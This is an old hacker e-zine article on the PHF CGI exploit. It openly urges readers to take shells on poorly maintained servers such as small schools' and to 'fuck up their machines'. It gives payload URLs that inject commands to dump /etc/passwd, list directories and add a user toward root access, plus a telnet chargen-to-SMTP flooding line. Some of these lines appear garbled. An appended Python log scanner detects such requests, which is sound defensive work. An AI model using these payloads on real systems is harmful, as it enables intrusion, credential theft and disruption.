Reality Check Network - PHF Web Hacking

       R  E  A  L  I  T  Y     C  H  E  C  K     N  E  T  W  O  R  K!
         From Issue #33 - PHF Web Hacking                                    
         by Dagashi                                                          
      Alright there kiddies, it's time to lightly dive into the world of
  how to obtain shells that do not rightfully belong to you and how to
  generally piss off people on the Internet.  As always, this is a well
  known bit of information (because no one in their right mind would give
  you an exploit to a system that no one else knows of), so I take no
  responsibility for whatever you do with it.
      Since the majority of computers on the Internet are of UNIX descent,
  I will mainly talk about their problems and such.  Now, the majority
  of us know that UNIX is full of holes and other problems no matter what
  revisions and patches are made, so this might not come as a big surprise  
  when I tell you there is a common exploit that will run any program on    
  your victim machine.  It is the PHF hack.  Though it is no big deal to    
  the majority of ISP's, most little companies do not have the time or      
  money to deal with all the problems of their operating systems.  Small    
  schools that are NOT technologically oriented, like high schools with     
  T1's and such would be a good example.  And so, this will work on some    
  of them.                                                                  
      All that is required is to put this into the URL:
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
      and you have a listing of the passwd file to use or abuse.  But the
  PHF exploit can do more than just that (for those of you who will be
  flaming me for writing such a simple article).  It can access any type    
  of program that is on the opposing computer and run it.                   
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/               
      will give you the directory listing of everything from the root of    
  the system.  From there, you can just alter it accordingly to have a      
  peek around the system to see what else you can learn.                    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin            
      would show you every command that is available in the bin dir.  If    
  you slightly modified it, you would also be able to see the permissions   
  of the specific files.                                                    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin      
      which can come in handy since, well, seeing as how you have root
  permissions you now have a nice little bit of information about how the
  system functions and can use that to get even more access or information
  out of it.
      Or the best one of them all:                                          
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500     
      Do that and you MIGHT have root access to the server by telnet.  Be   
  forewarned that this is an old hack and many servers would not have the   
  PHF script still running or have chmoded it to 000.  This can get you     
  into a bunch of trouble, so be careful.  As I said before, this is well   
  known and I wouldn't give it out to you unless most system                
  administrators (if they deserve the title then they know this hack by     
  heart) knew it as well.  But there are always those that don't deserve    
  the honor of the name, and to those, you have my full consent to fuck up  
  their machines to hell.                                                   
      For fun and excitement, type "telnet 19 | telnet  
  25" in Linux and watch life become a ball.                                
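
      For the system administrators mentioned above, here is an added
  example (not part of the original article) that scans a web server
  access log for the requests shown here: a call to phf whose query
  string carries an encoded line break (%0a), which is what separates the
  alias value from the command.  The log lines are constructed samples,
  and the function names and the split on 2xx status are assumptions of
  this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in Common Log Format (documentation-range addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/1997:10:01:22 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1843
192.0.2.10 - - [12/Mar/1997:10:01:40 -0500] "GET /cgi-bin/phf?Qalias=x%0A/bin/ls%20-la%20/bin HTTP/1.0" 200 5120
198.51.100.7 - - [12/Mar/1997:10:02:03 -0500] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 412
203.0.113.5 - - [12/Mar/1997:10:05:11 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20/ HTTP/1.0" 404 207
198.51.100.7 - - [12/Mar/1997:10:06:00 -0500] "GET /index.html HTTP/1.0" 200 2048
"""

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')

def inspect(line):
    """Return a finding for a phf request carrying an encoded line break, else None."""
    m = CLF.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path.rsplit("/", 1)[-1].lower() != "phf":
        return None
    query = unquote(url.query)      # %0a / %0A / %0d become real control characters
    if "\n" not in query and "\r" not in query:
        return None                 # ordinary lookup, no line break in the query
    # Everything after the first line break is what the shell would see as a new command.
    injected = re.split(r"[\r\n]+", query, maxsplit=1)[1]
    status = int(m["status"])
    return {
        "ip": m["ip"],
        "time": m["ts"],
        "injected": injected,
        # 2xx means the script is still installed and answered; other codes
        # (removed script, chmod 000) mean the request was only a probe.
        "verdict": "script answered" if 200 <= status < 300 else "probe only",
    }

def scan(log_text):
    """Run inspect() over every line and keep the findings."""
    return [f for f in map(inspect, log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'{f["time"]} {f["ip"]} {f["verdict"]}: {f["injected"]!r}')
```

  Any "script answered" finding means the script should be removed and
  the host treated as suspect.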

